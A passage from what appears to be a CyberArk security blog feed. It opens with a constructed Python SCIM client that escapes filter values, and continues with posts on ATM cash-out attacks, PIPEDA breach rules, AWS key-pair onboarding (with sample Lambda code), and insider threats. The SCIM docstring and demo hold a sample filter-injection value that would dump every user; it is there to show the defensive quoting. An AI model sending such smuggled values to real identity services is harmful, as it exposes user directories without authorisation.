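the sample response below are constructed; this is not vendor code.
"""
import json
from urllib.parse import urlencode

SCIM_LIST = "urn:ietf:params:scim:api:messages:2.0:ListResponse"
SCIM_PATCH = "urn:ietf:params:scim:api:messages:2.0:PatchOp"


def scim_quote(value: str) -> str:
    """Escape a string for use inside a SCIM filter expression.

    Filter values are JSON strings (RFC 7644 s3.4.2.2).  Concatenating a raw
    caller-supplied value would let a userName such as
        x" or userName pr or "
    turn a lookup of one user into a dump of every user.
    """
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def user_lookup_url(base_url: str, user_name: str) -> str:
    """Build GET <base>/Users?filter=userName eq "<name>" with safe quoting."""
    filt = "userName eq " + scim_quote(user_name)
    return f"{base_url.rstrip('/')}/Users?" + urlencode({"filter": filt})


def parse_list_response(body: str) -> list:
    """Validate a SCIM ListResponse envelope and return its Resources.

    Anything without the ListResponse schema URN is rejected, so an error
    document or an HTML login page is never mistaken for a result set.
    """
    doc = json.loads(body)
    if SCIM_LIST not in doc.get("schemas", []):
        raise ValueError("not a SCIM ListResponse")
    resources = doc.get("Resources", [])
    if doc.get("totalResults", len(resources)) < len(resources):
        raise ValueError("totalResults smaller than the returned page")
    return resources


def add_group_member_patch(user_id: str) -> dict:
    """PatchOp body that adds one user to a Group (PATCH <base>/Groups/<id>).

    A PATCH 'add' on 'members' avoids PUT-ing the whole group and clobbering
    members that another process granted concurrently.
    """
    return {
        "schemas": [SCIM_PATCH],
        "Operations": [
            {"op": "add", "path": "members", "value": [{"value": user_id}]}
        ],
    }


def remove_group_member_patch(user_id: str) -> dict:
    """PatchOp body that removes one member by id via a filtered path."""
    path = "members[value eq " + scim_quote(user_id) + "]"
    return {"schemas": [SCIM_PATCH],
            "Operations": [{"op": "remove", "path": path}]}


# Constructed sample ListResponse in the shape a SCIM server returns.
SAMPLE_LIST_RESPONSE = json.dumps({
    "schemas": [SCIM_LIST],
    "totalResults": 1,
    "itemsPerPage": 1,
    "startIndex": 1,
    "Resources": [
        {"id": "42", "userName": "jsmith", "active": True,
         "groups": [{"value": "7", "display": "Vault Admins"}]},
    ],
})

if __name__ == "__main__":
    base = "https://scim.example.test/scim/v2"          # assumed endpoint
    print(user_lookup_url(base, 'x" or userName pr or "'))
    users = parse_list_response(SAMPLE_LIST_RESPONSE)
    print(users[0]["userName"], [g["display"] for g in users[0]["groups"]])
    print(json.dumps(add_group_member_patch(users[0]["id"])))
    print(json.dumps(remove_group_member_patch(users[0]["id"])))
```

The quoting helper is the part worth copying: SCIM filters are a small query language, and an IGA connector that interpolates names from HR feeds or self-service forms into them is an injection target just like a SQL query.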

Now is the time to harness the full power of Privileged Access Security and Identity Governance. Learn more about the CyberArk SailPoint integration on the CyberArk Marketplace and in this on-demand webinar.

 

]]>
Stop ATM Cash-out Attacks by Securing Privileged Access https://www.cyberark.com/blog/stop-atm-payout-attacks-by-securing-privileged-access/ Thu, 16 Aug 2018 12:21:25 +0000 https://www.cyberark.com/?p=26857

According to security reporter Brian Krebs, the FBI issued a confidential alert to banks on Friday, warning that “cyber criminals are planning to conduct a global Automated Teller Machine (ATM) cash-out scheme…commonly referred to as an unlimited operation.” The FBI further stated that “unlimited operations compromise a financial institution or payment card processor with malware to access bank customer card information and exploit network access, enabling large scale theft of funds from ATMs.”

ATM attacks are not new. The famous Barnaby Jack demonstrated how he could make ATMs spit out cash on the stage of Black Hat in 2010. But this required physical access to unpatched machines.

The ‘unlimited operation’ ATM attack is much different and more devastating. Criminals infiltrate a bank’s infrastructure to steal and clone bank cards, remove fraud controls and withdrawal limits, and then coordinate large-scale withdrawals from physical ATMs to steal huge amounts of cash.

While it sounds like a bank robbery created in a Sci-Fi novel, this approach isn’t new either. Just ask Roman Seleznev, a hacker arrested recently for coordinating a similar attack on RBS Worldpay, a payment processor in Atlanta, back in 2008. The DOJ report stated at the time that the attack was “then the most sophisticated and organized computer fraud attack ever conducted.”

Despite the RBS attacks resulting in $9 million stolen from 2,100 ATMs worldwide in less than 12 hours, the industry is still prone to such massive, coordinated attacks. These attacks are possible for the same reason cyber attackers were able to steal $81 million from the Bangladesh Bank in 2016 – a failure to properly secure IT infrastructure, specifically around privileged access.

In both the RBS ATM attacks in 2008 and the SWIFT attacks in 2016, attackers used simple means such as phishing to gain a foothold on an employee device, elevated privileges and moved laterally into the network. Once on the network with this level of privileged access, attackers can study the security infrastructure and avoid controls, decrypt data and prepare for their coordinated assault on ATMs.

Once attackers are on the network with elevated privileges, an attack on ATMs is a ‘path of least resistance.’ They can steal as much money as possible in a short time without sounding the alarms, since at this point, attackers literally “own” the organization.

Now, the FBI urges banks to review how they handle security, specifically around “implementing strong password requirements and two-factor authentication using a physical or digital token when possible for local administrators…”

A better way to phrase this is: Lock down your privileged access!

But for those banks that have not learned the lessons taught over the past 10 years, here are a few essential principles of protection used by smart organizations:

  • Patch Now, Patch Always: Whether it’s ATMs, financial systems, IT infrastructure or endpoints, attackers seek out known, unpatched vulnerabilities as an open invitation into your network. It’s one thing to fall victim to an advanced phishing attack that is highly sophisticated. It’s another to leave a proverbial backdoor open into the vault.
  • Contain Attacks by Securing Privileged Access: The ATM attackers actively seek out endpoints with local admin rights – removing admin rights prevents attackers from moving into the network and installing malware. But privileged access security doesn’t stop there – domain admin credentials, privileged SSH keys and any other credentials that provide access to sensitive accounts or systems need to be locked down and controlled. By centrally securing privileged credentials, controlling access based on role, and enforcing multi-factor authentication before granting access, the attackers cannot move through the environment to remove security controls and execute their attacks.
  • Continuous Monitoring: Almost all bank attacks start with attackers targeting their networks. By closely monitoring networks based on events or patterns, organizations can determine if an attacker manages to hijack credentials and gain access to target assets – such as ATMs. Organizations must be able to quickly detect and address the malicious behavior.

Cyber criminals will continue to innovate and change tactics to reach their end goal – but only if organizations force them to do so by blocking the known pathways. In this case, crime pays, at least until banks get better at privileged access security.

]]>
Privileged Access Security for Dummies: A Practical, How-To Guide https://www.cyberark.com/blog/privileged-access-security-for-dummies-a-practical-how-to-guide/ Tue, 14 Aug 2018 21:51:42 +0000 https://www.cyberark.com/?p=26690

Let’s face it. Protecting an organization from ever-evolving cyber threats is no small feat. Staying ahead of would-be attackers is a job that requires constant vigilance, innovation, collaboration and continual learning.

Savvy security practitioners understand that one of the most important, preventative steps they can take to bolster their cyber security posture is to secure privileged access – including privileged accounts, credentials and secrets. Protecting privilege is a process, and it’s often a key element of an enterprise-wide security program. Perhaps you are wondering if there is a guide with actionable – yet easy-to-understand – information about establishing and maintaining a privileged access security program that you could flip open and reference.

Look no further than the new Privileged Access Security for Dummies guide. Brought to you by CyberArk, this guide is meant for an extended team to read – from CISOs to Developers – and not just IT security. Often, cyber security books go into significant technical depth, which is great for highly technical audiences. You should expect this guide to be conversational, with plenty of examples, analogies and elements designed to make this important security topic more approachable. With this quick and easy guide, readers can better understand and articulate the need to prioritize risk reduction associated with privileged-related access.

Inside, you’ll meet a full cast of characters – from Billy the “freelance hacker” who has made a career out of phishing unsuspecting corporate victims, to “Liam the Leak,” an engineer with access to sensitive data, who’s been passed over for a promotion one too many times. Through their stories, you’ll gain tips, technical insights and lessons others have learned – sometimes painfully so.

Download Privileged Access Security for Dummies today to:

  • Discover the many types of privileged access used by humans and non-human automated processes
  • Learn more about data loss, compliance, audit and third-party risks
  • Get tips for establishing a privileged access security program
  • Explore a 10-step approach for securing privileged access across the enterprise

Get smart on privileged access security. Download the free guide today.

 

]]>
Critical Updates to the Canadian Digital Privacy Act (PIPEDA) https://www.cyberark.com/blog/critical-updates-to-the-canadian-digital-privacy-act-pipeda/ Thu, 09 Aug 2018 14:37:06 +0000 https://www.cyberark.com/?p=26608

If you work for a Canadian business in the private sector, put down that Tim Hortons and read this blog. The Government of Canada has made a number of amendments to the Digital Privacy Act, which received Royal Assent in 2015. The changes, which officially go into effect November 1, 2018, affect multiple sections within the statute.

The scope of the changes is considerable and wide ranging, extending across many different areas including valid consent from individuals (when involving personal information), public interest disclosures, new provisions for business transactions and much more. The biggest, and arguably most important, change appears to be applied to the ‘breach reporting, notification and record keeping’ section.

Businesses now have an obligation to notify consumers – as well as third parties and other necessary business partners – with utmost haste upon becoming aware of a data breach that involves personal information. Failure to do so can result in monetary penalties, negative implications to stock price, distrust from existing customers and impact to future performance and profitability for the business. The original statute states:

“‘Breach of security safeguards’ means the loss of, unauthorized access to or unauthorized disclosure of personal information resulting from a breach of an organization’s security safeguards that are referred to in clause 4.7 of Schedule 1 or from a failure to establish those safeguards.”

There is an omnipresent weakness in the arena of “authorization controls” as described in the Mandiant M-Trends 2018 report. Often, these controls are not hardened to thwart advanced attackers. Organizations are also not doing enough to both secure privileged credentials and enforce multi-factor authentication (MFA). That same report warns, “If you’ve been breached, our statistics show that you are much more likely to be attacked and suffer another breach. If you have not taken steps to enhance your security posture, you are taking a significant risk.” There’s an industry mantra that goes something like this: “There are only two types of companies: those that have been breached and those that will be breached.”

Before You Call the Royal Canadian Mounted Police, Call CyberArk

Before widespread panic ensues, fear not. The CyberArk Privileged Access Security Solution can help your organization mitigate risk from a data breach that originates either from the inside or externally through a variety of advanced techniques. The core of our solution provides advanced monitoring and alerting to aid in the notification of affected individuals and relevant third parties involving “breaches of security safeguards” that pose a “real risk of significant harm” to affected individuals.

Another major element of the statute is the requirement to keep a record of all breaches involving personal information and provide a copy to the Office of the Privacy Commissioner of Canada upon request. CyberArk provides comprehensive and integrated reports on privileged accounts and privileged session activities. The log files are stored in a tamper proof vault to prevent unauthorized access, modification or deletion of the files. This capability reduces time spent conducting an audit and both simplifies and streamlines the process in reporting back to regulators.

Nobody Likes Bad Hygiene, Especially in Security

Furthermore, CyberArk has developed a programmatic approach designed to help organizations protect themselves by establishing and maintaining strong privileged access security hygiene. The CyberArk Privileged Access Security Hygiene Program leverages the extensive experience the CyberArk Security Services team has gained from responding to significant data breaches, including many large Canadian organizations. These breaches have resulted from some of the most common attacks on privileged access, providing valuable insights into how attackers operate and exploit an organization’s vulnerabilities.

This mandate, alongside many other recent pieces of legislation, is a giant step in the right direction in the world of security. Providing people with more control over their own personal data is a good thing. Notifying said people when personal data becomes compromised is even better. If we learn from history, consider the words of Abraham Lincoln, “Honesty is the best policy.” That statement certainly rings true today in requiring organizations to be more forthcoming in the event of a breach. The updates made to the Canadian Digital Privacy Act will undoubtedly force businesses to rethink their security strategy, strengthening their security controls to mitigate the risk of a personal data breach. In the end, everyone wins.

You can review the changes in this very brief announcement sent out by Her Excellency the Governor General in Council or find more details summarized here.

Be sure to reach out to your local sales representative or contact us to see how we can help support compliance with this privacy act and many others.

]]>
How to Handle “Office Space” Moments and Move Forward with Your Privileged Access Security Program https://www.cyberark.com/blog/how-to-handle-office-space-moments-and-move-forward-with-your-privileged-access-security-program/ Thu, 02 Aug 2018 21:10:14 +0000 https://www.cyberark.com/?p=26505

One of the most well-known characters from the cult-classic movie “Office Space” is Milton Waddams, who famously uttered, “I don’t care if they lay me off…but it is not okay if they take my stapler!” Sometimes it feels like security teams are dealing with similar challenges, as executive leadership questions program expenditures or users balk at changing daily routines to support the greater goal of reducing privileged access-related security risks. If you’ve ever fought the urge to take a bat to your office printer (or computer… or entire data center, for that matter), this blog post is for you.

At CyberArk Impact Americas 2018, a popular “Defense Strategy” breakout session featured a CyberArk customer panel – with participants sharing their own real-life “Office Space” moments. Here’s a look back at some highlights of the discussion. Names have been withheld to protect these hard-working security leaders who have never once thought about setting their office on fire.

Mmmmmmk…yeah…we’re going to need to go ahead and secure our privileged accounts

How to build the business case for prioritizing a privileged access security initiative

The security engineer at a government technology services provider joined the organization as it was beginning its journey to the cloud, and the expectations around security, reliability and seamless integration were high. This pressure to deliver was compounded by heightened security mandates and regulations for the handling of classified information. Yet the legacy privileged access management system he had inherited kept failing, forcing him and his team to come into the office on nights and weekends for emergency fixes with increasing regularity.

He saw a critical need to invest in a strong privileged access security platform that could grow with the organization’s needs and scale to meet future use cases, but he knew getting executive leadership on board for a full rip-and-replace would be a challenge. To help build a compelling business case for change, he calculated the operational cost of this near-constant triage – a staggering $160,000 in extraneous personnel hours per year. This certainly got management’s attention, and he soon had the approvals necessary to move forward with privileged access security vendor evaluations. After an extensive evaluation process, the team selected the CyberArk Privileged Access Security Solution.

As is often the case during times of significant change, the engineer faced some initial internal pushback around the legacy system replacement. However, he was able to quickly alleviate fears by demonstrating CyberArk’s ability to meet current and future requirements along each step of the organization’s projected roadmap. The organization’s application development team was particularly impressed with the solution’s low latency, quickly realizing how it could help them to improve their security posture without hindering application development and delivery.

We need to talk about your flair

How to broaden your organization’s use of privileged access security across more parts of the organization

A string of acquisitions brought valuable new technologies and business models to a large software development company, further driving the company’s culture of accelerating innovation. However, a distributed environment coupled with a pervasive “startup mentality” presented numerous challenges for the security team. Without a centralized privileged access security solution in place, teams often took matters into their own hands, leveraging their own disparate security tools, automating and “fixing” workflows without security in mind, and even developing their own password vaulting tools. While this proactivity and overall intent was applauded, this security leader and his team needed a way to educate employees about privileged access security best practices, along with the CyberArk solutions available to them.

To drive broad awareness across groups, the security team partnered with the organization’s communications team and developed articles for the company newsletter, along with a number of how-to blog posts and wiki updates. They didn’t stop there. They also organized an internal workshop series to introduce different departments and geographies to CyberArk. Some sessions were designed for existing CyberArk users who needed a refresher (but perhaps didn’t realize it). Rather than telling them what to do, the focus of the session was on asking them what they were trying to accomplish – and why. This approach fostered a collaborative, two-way dialogue enabling the security team to empower users while also training them on best practices, processes, new features and use cases. This strategy has significantly helped to boost awareness and adoption of the privileged access security solution and has also helped business teams realize increased operational efficiency through simplified workflows and processes.

I believe you have my passwords

How to turn privileged access security skeptics into advocates

This security leader overseeing privileged access security initiatives at a global provider of risk, retirement and health solutions is no stranger to pushback. Change can be hard and preconceived notions are strong. A perfect example of this came to him one day in the form of an email, in which a stakeholder expressed skepticism around an impending privileged access security program rollout.

The security leader took time to consider that person’s perspective and then crafted his reply. In it, he stressed the unique opportunity the stakeholder – and organization as a whole – had to tailor this new implementation to their specific needs and pain points. He underscored his focus on collaboration, usability and performance, and invited a further discussion to address the person’s concerns – which the stakeholder readily accepted. The positive dialogue that followed was the first in a series of conversations that cultivated a strong privileged access security program champion for the organization.

The security leader took away three key learnings from this interaction. First, it’s important to practice and polish your pitch, so that you can communicate your vision for your privileged access security program in a compelling, confident way. Second, stop talking and really listen to what stakeholders say. Then, go beyond listening to ensure their needs are taken into consideration, while also demonstrating how the vision will equate to tangible benefits and improvements. Third, take the time to truly engage with them to gain their trust, alleviate fears, provide strong evidence (i.e. analyst reports, industry studies, etc.) and documentation (i.e., defined templates, scoping documentation, how-to’s, etc.) to support the privileged access security program’s vision, and most importantly, form a collaborative relationship so that privileged access security tools and workflows are optimized to meet their needs.

Want more tips on building a business case for your privileged access security program and getting stakeholders to give up their old “staplers” for something much better? Check out the CISO View report, “The Balancing Act: The CISO View on Improving Privileged Access Controls.”

 

]]>
AWS Key Pairs: One Ring to Rule Them All https://www.cyberark.com/blog/aws-key-pairs-one-ring-to-rule-them-all/ Tue, 31 Jul 2018 13:09:55 +0000 https://www.cyberark.com/?p=26438

The advent of cloud computing has fundamentally changed the way we now think of modern data centers. Dynamic, elastic in nature and fully automated, cloud is well-suited for almost everything to be delivered ‘as code.’ Despite all of the benefits, there are also inherent and ever-growing risks in the cloud that are typically absent from the on-premises world.

The use of privileged accounts may be slightly different in cloud instances, but they are equally important to protect. Not only does a cloud platform have its own privileged accounts and secrets, but the regular *NIX and Windows instances maintain their own as well – from privileged SSH keys to a local administrator account. Regardless, to secure these powerful credentials, they must be managed and accessed with a privileged access security solution.

Privileged Challenges in Elastic and Dynamic Cloud Environments

An AWS Key Pair is very much like the “One Ring” in the Lord of the Rings series. Designed to establish total domination over the people of Middle Earth, the Dark Lord Sauron forged the One Ring in the fires of Mount Doom, giving him great and magical powers. The ring was essentially woven directly into his being, totally bound to it, providing him with great power but also leaving him vulnerable and powerless without it.

The AWS Key Pair is not so different from the One Ring. It controls OS-level access to the instances in your AWS environment: its private key decrypts the initial local Administrator password of Windows instances and is itself the SSH private key used to log into *NIX instances. Key pairs are scoped to a single AWS region, and in most cases an organization uses very few of them, so one key pair typically unlocks many instances.

Like the One Ring, the key pair literally holds the “rings of power” (or more accurately, the “keys of power”) to your entire cloud kingdom. Having the key pair is a crucial step in gaining access to the entire IaaS environment. If this were the case in the Lord of the Rings, it would’ve made Frodo’s quest to destroy the Ring a lot easier – and uneventful. If the gates of Mordor were the IaaS environment, he could’ve walked straight through and casually chucked the One Ring into the fires of Mount Doom with ease.

Once the key falls into the wrong hands, it exposes your entire IaaS to potential attacks. Attackers constantly seek the types of secrets that can be used to access your organization’s environment. When you create a key pair, the private key is downloaded to your workstation. So in a case where there is already an attacker inside the network waiting for someone to slip, your key pairs are exposed and it’s game over.

You can create more than one key, but the problem remains the same, and with multiple key pairs, the challenge becomes storing and managing multiple pairs of keys.

How Do I Solve This Problem?

There are a couple of options depending upon the needs of your organization. For example, you can use a privileged access security solution to manage your IaaS privileged accounts. You can (and should) even build this process directly into your own CI/CD pipeline. You’ll likely need to make some changes in the process and add new integrations – DevOps and containers present another potential set of vulnerabilities and a potentially enlarged attack surface. As DevOps and/or containers become increasingly important to businesses, it is critical to secure these environments too. For example, you will need to onboard credentials, secrets and other privileged accounts for each new EC2 compute instance and de-provision them once the instance is terminated.

Often a better solution is to completely automate the process of securely onboarding the credentials of newly created instances, so that you never have to expose the credentials again after deployment and configuration.

Event-Driven Automatic Onboarding

Until an organization secures its CI/CD pipelines, it is exposed to a variety of attack vectors. To address this reality, CyberArk offers an open source AWS Automatic Onboarding tool available on GitHub, which is designed to solve this exact problem for AWS customers. The solution is based on Lambda functions that are triggered automatically by AWS CloudWatch Events when instances are spun up or down. CloudWatch detects a new instance regardless of who or what created it, including instances launched from the CLI or by AWS Auto Scaling; no matter who created the instance or where, CyberArk can detect it. The Lambda functions automatically onboard the privileged SSH keys or local administrator accounts to the CyberArk Privileged Access Security Solution and then trigger an immediate rotation of the password/SSH key. This ensures the original key pair can no longer be used to gain privileged access to those instances.

Problem solved? Not entirely. What about the key pair?  It’s still a problem. One of the Lambda function’s capabilities can automatically create a key pair for you and store it directly in the CyberArk Enterprise Password Vault. With this approach, we can make sure it is never downloaded to the developer’s endpoint devices, and all access to it is through the Lambda function.

One important benefit to this approach is that unlike schedule-based scanners that provide you a partial view into your environment, this is an event-driven solution that is always aware of the current environment. Here, changes are made in real time.
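As an added illustration of the event-driven flow above (example code, not the open source AWS Automatic Onboarding tool itself), the Python handler below processes an EC2 Instance State-change Notification the way a Lambda function would: on `running` it looks the instance up, decides whether the privileged account to protect is a Windows Administrator or a *NIX SSH login, onboards it and immediately requests a rotation; on `terminated` it offboards the account; redelivered or unrelated events are ignored. The event and describe_instances shapes follow what AWS and boto3 emit, but both are constructed inline so the code runs offline, and the `VaultClient` interface is a hypothetical stand-in for whatever vault API you use.

```python
"""Event-driven onboarding of EC2 instance credentials into a vault.

Added example, not vendor code.  The VaultClient interface is hypothetical;
the event and describe_instances payloads are constructed to match what
CloudWatch Events and boto3 produce.
"""
from typing import Protocol


class VaultClient(Protocol):
    """Hypothetical vault API; in practice this wraps the vendor's REST interface."""
    def has(self, instance_id: str) -> bool: ...
    def onboard(self, instance_id: str, address: str, username: str, platform: str) -> None: ...
    def rotate(self, instance_id: str) -> None: ...
    def offboard(self, instance_id: str) -> None: ...


class InMemoryVault:
    """Stand-in vault that records what the handler asked it to do."""
    def __init__(self):
        self.accounts = {}
        self.log = []

    def has(self, instance_id):
        return instance_id in self.accounts

    def onboard(self, instance_id, address, username, platform):
        self.accounts[instance_id] = {"address": address, "username": username,
                                      "platform": platform, "rotated": False}
        self.log.append(("onboard", instance_id))

    def rotate(self, instance_id):
        self.accounts[instance_id]["rotated"] = True
        self.log.append(("rotate", instance_id))

    def offboard(self, instance_id):
        self.accounts.pop(instance_id, None)
        self.log.append(("offboard", instance_id))


def classify_instance(desc: dict) -> dict:
    """Pick the privileged account to protect from one describe_instances entry.

    boto3 sets Platform == "windows" only for Windows; Linux instances carry
    no Platform key, so the default is an SSH login as the initial user.
    """
    windows = desc.get("Platform", "").lower() == "windows"
    return {
        "platform": "windows" if windows else "unix",
        "username": "Administrator" if windows else "ec2-user",
        "address": desc.get("PrivateIpAddress") or desc["InstanceId"],
        "key_name": desc.get("KeyName"),
    }


def handle_state_change(event: dict, describe, vault: VaultClient) -> str:
    """Handle one EC2 Instance State-change Notification.

    describe(instance_id) returns a boto3-shaped describe_instances dict
    (injected so the example runs offline).  Returns an action string.
    """
    if event.get("detail-type") != "EC2 Instance State-change Notification":
        return "ignored:not-ec2-state-change"
    detail = event["detail"]
    instance_id, state = detail["instance-id"], detail["state"]

    if state == "running":
        if vault.has(instance_id):
            return "ignored:already-onboarded"      # events can be redelivered
        reservations = describe(instance_id)["Reservations"]
        if not reservations:
            return "ignored:instance-gone"         # terminated before we looked
        info = classify_instance(reservations[0]["Instances"][0])
        vault.onboard(instance_id, info["address"], info["username"], info["platform"])
        vault.rotate(instance_id)   # launch key pair/password no longer opens the box
        return f"onboarded:{info['platform']}"
    if state == "terminated":
        vault.offboard(instance_id)
        return "offboarded"
    return f"ignored:{state}"


def sample_event(instance_id: str, state: str) -> dict:
    """Constructed CloudWatch Events payload with the fields AWS emits."""
    return {"version": "0", "source": "aws.ec2",
            "detail-type": "EC2 Instance State-change Notification",
            "region": "us-east-1",
            "detail": {"instance-id": instance_id, "state": state}}


SAMPLE_INSTANCES = {   # constructed describe_instances data keyed by instance id
    "i-0a1b2c3d4e5f60001": {"InstanceId": "i-0a1b2c3d4e5f60001", "Platform": "windows",
                            "KeyName": "prod-keypair", "PrivateIpAddress": "10.0.1.10"},
    "i-0a1b2c3d4e5f60002": {"InstanceId": "i-0a1b2c3d4e5f60002",
                            "KeyName": "prod-keypair", "PrivateIpAddress": "10.0.1.11"},
}


def fake_describe(instance_id: str) -> dict:
    inst = SAMPLE_INSTANCES.get(instance_id)
    return {"Reservations": [{"Instances": [inst]}] if inst else []}


if __name__ == "__main__":
    vault = InMemoryVault()
    for iid in SAMPLE_INSTANCES:
        print(iid, handle_state_change(sample_event(iid, "running"), fake_describe, vault))
    print(handle_state_change(sample_event("i-0a1b2c3d4e5f60001", "running"), fake_describe, vault))
    print(handle_state_change(sample_event("i-0a1b2c3d4e5f60001", "terminated"), fake_describe, vault))
    print(vault.accounts)
```

Two details matter in production: the handler must be idempotent, because CloudWatch can deliver the same event more than once, and the describe call can legitimately come back empty for a short-lived Auto Scaling instance that was already terminated.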

Let CyberArk Help You in Your Quest for a Better Security Posture

The AWS Automatic Onboarding tool is packaged as a CloudFormation template, which fully automates the deployment. We recommend deploying the template in every AWS account and every region; it supports CyberArk environments in both cloud and hybrid architectures.

It’s a security best practice to make sure that AWS Key Pairs are managed and secured, not left lying around locally on a computer or some other server. It is also a best practice to identify and manage all privileged accounts, cloud secrets and other credentials that are categorized as “privileged.”

Change, especially technological change, is certainly welcome and undoubtedly can deliver many great benefits, but it’s critical to ensure that you’re doing everything you can to protect your most valuable assets that leverage new technologies. CyberArk can be your Samwise Gamgee – only more reliable and capable – in your quest for securing and managing AWS Key Pairs and beyond. Contact your local CyberArk sales representative for details. To protect DevOps environments, try CyberArk Conjur Open Source at www.conjur.org.

 

]]>
Insider Threats Come In All Shapes and Sizes https://www.cyberark.com/blog/insider-threats-come-in-all-shapes-and-sizes/ Fri, 27 Jul 2018 14:54:34 +0000 https://www.cyberark.com/?p=26418

Verizon’s 2018 Data Breach Investigation Report indicates that 68 percent of data breaches take two or more months to uncover, highlighting the importance of having strong, yet manageable, audit trails as well as robust detection tools in place. The study also mentions that while insider threats comprise only 28 percent of all data breaches, they are often cited as being the most costly and most difficult to prevent and detect for businesses today. There are several reasons for this, but chiefly, insiders often have knowledge of, and access to, sensitive information and can often legitimately bypass security measures without raising red flags, as they are “trusted users.”

Insider threat actors can typically be categorized into four main groups: malicious insiders, exploited insiders, external insiders and unintentional insiders. This post will focus on examples from the first group: the malicious insider. Malicious insiders are motivated by a number of underlying factors – anger, financial struggles, political activism or outside influence – so it’s not always easy to pinpoint who a potential malicious insider is, or what their particular motives are.

In a recent example, a disgruntled employee faced with an impending dismissal, subverted a company firewall to access source code data, exported it to a personal hard drive and attempted to sell it for millions of dollars in cryptocurrency. Another recent breach highlights a different flavor of insider attack, where a now ex-employee is being accused of writing software to steal internal secrets, transferring this data to third parties and doing so on three separate computers of different employees to falsely implicate those individuals to avoid scrutiny (unsuccessfully – he’s now in court). These two examples represent the types of dangerous activities that reinforce the need to have controls in place to more closely watch and remediate potentially malicious insider threats.

Before proceeding, it’s important to make two observations. First, as we know, many business users need sensitive data in order to do their jobs (for example, developers need access to the source code), but also require privileged access to log into the systems that house it. Second, every employee has some level of access to confidential information; be it through company memos, announcements, etc. – meaning that everyone inside the organization represents a potential insider threat.

It is paramount to control how information is shared, or more importantly, not shared. The objective of security tools and teams is not to make it impossible for people to do their jobs; but rather it is to ensure that proper access is granted and that sensitive information has adequate protection to prevent it from leaking. There are controls and tools that can be used to not only sound the alarm when something fishy might be occurring, but to automatically and promptly limit the damage done once a malicious insider decides to go rogue.

The CyberArk Core Privileged Access Security Solution requires that users retrieve privileged credentials from the encrypted password vault, which can be set to create and rotate complex credentials as often as policy dictates. In the event that users access systems without first retrieving a credential from the vault, CyberArk has the ability to flag this type of behavior as “suspicious” or “high risk,” and administrators can manually or automatically suspend or terminate the session. This prevents the threat actor from proceeding further and from connecting to the specific account, for example, a database that houses source code. With this use case, suspicious behavior is flagged to administrators and the session can be suspended rather than automatically terminated, which leads to fewer headaches for operations team members. If the session is deemed to be harmless, it can be resumed with approval rather than forcing users to start over.

Another way that internal users exploit security vulnerabilities is through unmanaged accounts. In many examples, internal users have accessed sensitive and valuable information through manually created backdoor accounts that don’t require the retrieval of a privileged credential. Oftentimes this provides unmitigated and unmonitored access that can prove catastrophic. However, the CyberArk Core Privileged Access Security Solution can be set to add unmanaged privileged accounts to the vault automatically (or manually) and create a complex password in real time, preventing further movement. This also prohibits users from essentially creating their own paths within a network, provides adequate checks to ensure that the right access is granted, and monitors that access in real time to detect potentially dangerous activities. In the case of creating backdoor accounts to access privileged information, like manufacturing plans, the ability to automatically onboard these accounts with CyberArk Privileged Threat Analytics would have created a new credential while the actor was inside, essentially trapping them in the session with nowhere to run or hide.

It’s hard to know if an employee may turn rogue, and it’s even harder to know who might fall victim to an attack and have their accounts exploited. To effectively protect against insider threats, organizations must first understand who has privileged access to which systems. From there, they should minimize user privileges using the principle of least privilege to reduce the attack surface, lock down privileged credentials, and control and monitor privileged accounts. Technology can also help to identify and alert on anomalous behavior.

Learn how CyberArk can help your organization reduce the risk of malicious insider threats and limit potential damage by downloading our eBook, contacting your local CyberArk sales representative or reaching out to us for a demo to see some of the functionality highlighted in this blog in a live environment.

What Harry Potter Teaches Us about Constant Vigilance and Insider Threats https://www.cyberark.com/blog/harry-potter-teaches-us-constant-vigilance-insider-threats/ Wed, 25 Jul 2018 20:45:52 +0000 https://www.cyberark.com/?p=26306/

The character of Mad Eye Moody in “Harry Potter and the Goblet of Fire” preached “constant vigilance” against dark wizards, even as he was a villain in disguise. The real Mad Eye Moody had been kidnapped and locked in a trunk for an entire year, while an imposter assumed his form and took on his role as the defense against the dark arts teacher at Hogwarts School of Witchcraft and Wizardry. Not only was he an imposter, but he was a dark wizard, one of Lord Voldemort’s most loyal followers determined to take Harry out and restore Voldemort to full power.

“Constant vigilance” is sage advice for businesses too. With the threat of malicious insiders, undetected attackers moving around a network and other risks to mitigate, there is no “one-and-done” solution in security. Industry research such as the 2018 Verizon Data Breach Investigations Report (DBIR) helps the collective community keep an eye on trends and glean insights from lessons learned to get ahead of potential vulnerabilities before they become problems. A few key trends identified in the report caught my eye.

In manufacturing, notable trends include targeted attacks and intellectual property theft. According to the report, cyber espionage accounted for 31 percent of all breaches in manufacturing. This number is down from last year, but cyber espionage remains a very real threat to the industry. Attackers go after manufacturing targets with a specific purpose in mind, choosing victims with valuable trade secrets and intellectual property. Once this sensitive information has been exfiltrated, competitors can use it against the victim on the market – a different approach than directly siphoning funds, but one that still ultimately results in financial gain for the attackers.

In the healthcare industry, the story of the year (keeping in line with previous years) is not just about outside attackers, but about insiders as well. Ransomware remains prevalent, though not at the constant onslaught that many people perceive. According to the report, most companies receive malware on six or fewer days a year. However, it only takes ONE successful ransomware attack to bring an organization to its knees. And while the security industry tends to focus on data being stolen by outside attackers, it’s important to pay attention to what is going on within the organization as well. This year’s report indicates there are many cases in which employees are misusing their accounts, whether intentionally or by accident. As such, employees with access to data beyond their role within the organization can become problematic.

Within healthcare, the report notes that employees sometimes misuse their credentials to access information they do not need in order to accomplish their tasks. For example, employees might search for a celebrity patient’s records out of curiosity, or “just for fun.” This type of activity underscores the importance of following least privilege principles, coupled with application control, as well as implementing privileged session monitoring capabilities. For even without malicious intent, the misuse of credentials can be just as damaging as stolen credentials, causing compliance and regulatory violations.

Many parts of the report apply across industries. While the report indicates that 78 percent of people didn’t click on a single phishing link all year (which is promising news), phishing and pretexting remain popular attack methods. Attackers only need one employee to click a link and open the door for the attacker to enter. Once an attacker has stolen credentials, they can maneuver within the network, escalating levels of privilege until they have the access they need to wreak the havoc they intend.

The report’s emphasis on education—making sure that employees are trained to identify and report social attacks such as phishing—is one important line of defense. Knowing what to look for is half the battle. However, it is imperative to have a strategy beyond education that prioritizes privileged access security. It remains just as important now as in recent years to practice least privilege principles along with privileged access management. Together, this provides businesses with a dramatically reduced attack surface. A focus on privileged access security hygiene is also critical for an effective cyber security program. Tactics such as multi-factor authentication, vaulting and rotating sensitive credentials can help protect powerful accounts within the organization.

